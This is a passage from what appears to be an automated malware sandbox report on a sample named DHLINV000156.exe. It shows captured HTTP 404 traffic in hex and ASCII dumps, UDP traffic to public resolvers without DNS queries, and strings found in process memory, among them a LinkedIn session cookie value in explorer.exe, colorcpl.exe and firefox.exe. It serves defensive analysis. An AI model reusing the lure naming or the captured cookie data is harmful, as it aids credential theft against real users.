09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:01:33 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:01:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LEIbnH%2FodEkAHP1iw2%2Bh7jQ0X%2FuqULyTgl%2BENPq54emz21%2BDEVVKSq5%2Fib97MSTr2BAEXnhxO5Szn1oxBobg3%2F03Yd96G2UqxJXXrfR0b8hPlGyLiPBRbhAIK4aoCnWu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aad75a919d5bb59-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 55 4b 6e 1b 47 10 5d 8b a7 28 b5 81 68 61 0e 47 de 38 c1 98 43 08 88 65 64 91 98 84 a5 c4 08 82 40 68 ce 14 bb cb ea 5f ba 8b 22 19 41 a7 c8 11 72 83 20 ab 64 e9 93 f8 26 41 0f 2d 8a 31 49 1b 4e 56 83 e9 7a f5 ea d5 af 7b 78 fc 7c fc f5 e5 8f 93 73 d0 6c cd a8 37 cc 1f 30 d2 a9 5a dc 90 80 10 71 46 cb 5a 78 55 81 66 0e a9 2a 4b af c2 c0 62 e9 d2 23 91 1d 50 b6 a3 de d1 d0 22 4b 68 b4 8c 09 b9 16 df 5f be 28 be 12 9b 73 27 2d 66 42 5c 04 1f 59 40 e3 1d a3 e3 5a 2c a8 65 5d b7 78 43 0d 16 dd 4f 1f c8 11 93 34 45 6a a4 c1 fa 49 0e 72 5c 14 70 81 32 36 1a ce 9d 22 87 30 0e 4c 96 7e 95 4c de c1 74 05 af a4 bb 86 ef 24 6b 98 bc 1a 43 b1 11 9b 06 51 ba 6b 2b 59 0f 1a 6f 4b ed 2d 42 51 8c 7a 43 26 36 38 9a 48 85 f0 d2 33 bc f0 73 d7 42 01 97 e4 e0 1b cf c3 72 6d ef 6d eb 8f 7e ea 39 6d a9 9f 79 63 fc a2 0f ce 93 6b 71 29 ca 7b 7c 88 3e 60 e4 55 57 38 e3 73 22 5b 6e 37 74 f5 c3 4b 01 fb d1 bc 0a db 58 19 99 9a ec 7d 00 9d 55 6e c1 0f e5 73 c8 3f 11 e3 55 ce 6e 8b 63 d7 65 9d 3e 2f 88 19 63 d5 c8 d8 6e c1 d3 dc 5a 19 57 57 46 46 85 57 64 a5 c2 83 ae 9f 27 37 35 91 02 43 ae 48 2d 64 08 86 9a ae df a5 69 1f bf 49 de 09 68 8c 4c a9 Data Ascii: 345UKnG](haG8Ced@h_"Ar d&A-1INVz{x\|sl70ZqFZxUf*Kb#P"Kh_(s'-fB\Y@Z,e]xCO4EjIr\p26"0L~Lt$kCQk+YoK-BQzC&68H3sBrmm~9myckq){\|>`UW8s"[n7tKX}Uns?Unce>/cnZWWFFWd'75CH-diIhL
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:01:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pUMDwtaR0%2FcDVyUqe9de88yzWfJosDQCLv4ZzfbEtGw45vXZsbnVq6gxxibRdDfrTQH8ZN1bADGHRc4XHEUxUkV8rZ3bOARR1cjZfm7esssVNMdIxLPMeJ9fwo1Sdx%2Ft"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aad75b8e82a373c-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 74 ed c1 d4 af 81 Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1\|0s$TqaLRCwCI9v4>Fqt
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:01:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aPKeRChf%2Bq8avOOyma4ZMYGOE1LBgnnzqrTqGDyVF5sZrDSH9%2BG3Bbbz7fbhEDpDFuEEAij5VRSB96sFjf2hKwFVHQNn30UgHpqJEWwTv%2BDRG272sX%2FdM2N8g4naPmRC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aad75c8b96e910c-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 74 ed Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1\|0s$TqaLRCwCI9v4>Fqt
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:02:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=44a1a047-7ae5-44b9-86f2-39339282f878X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=44a1a047-7ae5-44b9-86f2-39339282f878X-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1Content-Encoding: gzipX-Request-ID: 44a1a047-7ae5-44b9-86f2-39339282f878CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4CKfmEi6hfuyOqJFimLmxJqJMD2W0f%2B6dNYUDIaBbARP7JEQCVQiUE3YOcBblL6fsKj7owENPMR1NEa9yovsb7HZF36Ojq5prncnoXTUhBsFvtRPoh9DfuMf8jgQOoK4rg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:02:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=d06ed4a4-f75c-470e-9538-9ac94fc34da7X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=d06ed4a4-f75c-470e-9538-9ac94fc34da7X-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1Content-Encoding: gzipX-Request-ID: d06ed4a4-f75c-470e-9538-9ac94fc34da7CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KcnryoisomIUmOidqhdH4VJe%2FIn%2Fjy4aZBCD5bK1Z%2FwklcvROAG1FW88mvieLayyRmqQgfhKvKTKohU2qzRc0ZKqABDRBcASEM3OdxY9dtfLNy2OHg6Ho2iuQjS0QN%2FX5w%3D%3D"}],"group":"cf-nel","max_age":604800}NData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:02:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a820dce5-bfc5-4421-b6cb-5dca190aa50cX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a820dce5-bfc5-4421-b6cb-5dca190aa50cX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1Content-Encoding: gzipX-Request-ID: a820dce5-bfc5-4421-b6cb-5dca190aa50cCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqgn2vKh4piwegidxj54XXK2L7G4MqZcjM6aLBKLUWPn1mwIprICGXHD3lU3t3lzbiBTHFvUT3uy4LiOhcKbNIfT%2BzZKSZDoqNXF%2BHVPcNg4i6ChSrIJjwziAQ6zhINvkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: Data Raw: Data Ascii:

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: explorer.exe, 0000000A.00000002.6924685409.00000000145BC000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B77C000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
Source: colorcpl.exe, 0000000C.00000003.3400069623.0000000002B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: colorcpl.exe, 0000000C.00000003.3400069623.0000000002B1C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6876170729.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000A.00000000.3175026004.000000000FBE1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FBDD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000A.00000000.3174971656.000000000FBDD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FBDD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2:
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
